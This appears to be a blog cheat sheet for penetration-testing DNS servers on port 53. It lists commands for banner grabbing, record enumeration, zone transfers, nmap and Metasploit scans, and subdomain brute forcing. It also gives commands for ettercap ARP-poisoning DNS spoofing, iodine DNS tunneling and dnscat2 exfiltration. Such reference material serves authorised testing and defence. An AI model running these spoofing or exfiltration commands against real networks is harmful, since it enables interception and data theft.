Index / Blog / DNS Pentest - Port 53
Sunday, March 23, 2025 • SECURITY RESEARCH ADVISORY

DNS Pentest - Port 53


Recon


Banner Grabbing - Identify DNS Server Versions

# Use dig to determine DNS server versions
dig version.bind CHAOS TXT @DNS

# Alternatively, use nmap script to grab the banner
nmap --script dns-nsid <DNS_IP>

# Alternatively, use telnet to grab the banner
nc -nv -u <DNS_IP> 53
DNS Server Discovery
# Using dig
dig NS <target-domain>

# Using nslookup
nslookup -type=NS <target-domain>

Enumeration


Using DNS enum
dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>



Using dig

# Query DNS records
dig hackviser.com

# Query specific type of DNS records (e.g., A record)
dig A hackviser.com

# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>

# Query a specific DNS server
dig @<DNS_SERVER_IP> hackviser.com



Using nslookup

# Perform DNS queries
nslookup hackviser.com

# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX hackviser.com

# Query a specific DNS server
nslookup hackviser.com <DNS_IP>


Using host

# Perform DNS query
host hackviser.com

# Query specific type of DNS records (e.g., MX record)
host -t MX hackviser.com

# Perform a reverse DNS lookup
host <IP_ADDRESS>


Any Record Query

dig any victim.com @<DNS_IP>



Zone Transfer

# Without specifying a domain
dig axfr @<DNS_IP>

# With guessing the domain
dig axfr @<DNS_IP> <DOMAIN>

# Alternatively, you can use fierce for zone transfers or dictionary attacks
fierce --domain <DOMAIN> --dns-servers <DNS_IP>



Metasploit Modules and Nmap Scripts

msfconsole (use auxiliary/gather/enum_dns)

nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>

#Find the DNS server 
nmap --script vuln,vulners --script-args mincvss=7.0 -sC -sV -p 53 --open 10.10.0.0/16

nmap -sU -sV --script "dns* and (discovery or vuln) and not (dos or brute)" -p53 10.10.10.10


#DNS Server Processes Unauthoritative Recursive Queries
nmap -Pn -p 53 -sU --script dns-recursion 10.10.10.10

#DNS Server Cache Snooping Remote Information Disclosure
nmap -Pn -sU -sV -p 53 --script dns-cache-snoop 10.10.10.10


#DNS Enum via Metasploit
auxiliary/gather/enum_dns

auxiliary/scanner/dns/dns_amp



# DNS Enum 

nslookup
>SERVER 10.10.10.1
# Give the ip address of the server to find its hostname 
> 10.10.10.10 
10.10.10.10.in-addr.arpa      name = host02.test.domain.

dig axfr host02.test.domain @10.10.10.1



DNS Reverse and Subdomain Brute Force
dnsrecon -r 127.0.0.0/24 -n <IP_DNS>
dnsrecon -r 127.0.1.0/24 -n <IP_DNS>
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>
dnsrecon -d active.htb -a -n <IP_DNS>



DNS Cache Snooping

# Querying the DNS cache
dnsrecon -t std -d hackviser.com -D /usr/share/dnsrecon/namelist.txt



DNS Enumeration with Google Dorks

# Collecting DNS information using Google Dorks
site:hackviser.com -www.hackviser.com -site:www.hackviser.com



DNS Hacking tools
DNS Dumpster
DNS Recon
Spyse
SecurityTrails
DNSlytics


DNS CertSpotter

Subdomain Enumeration


Attack Vectors


DNS Spoofing
Poisoning with Ettercap
ettercap -T -q -M arp:remote /<gateway-ip>// /<target-ip>// -P dns_spoof
DNS Tunneling

# Server side
iodined -f -c <tunnel-ip> <domain>

# Client side
iodine <dns-server-ip> <domain>

Post-Exploitation


Cache Snooping
dig @<dns-server> <domain> +norecurse


Reverse DNS Lookup
dig -x <ip-address>
Exfiltration with dnscat2
# Server side
dnscat2 --dns server=<dns-server-ip>:53

# Client side
dnscat2 <domain>

Get In Touch

Open for technical advisories and offensive security engineering opportunities.

DIRECT EMAIL contact@nulljournal.info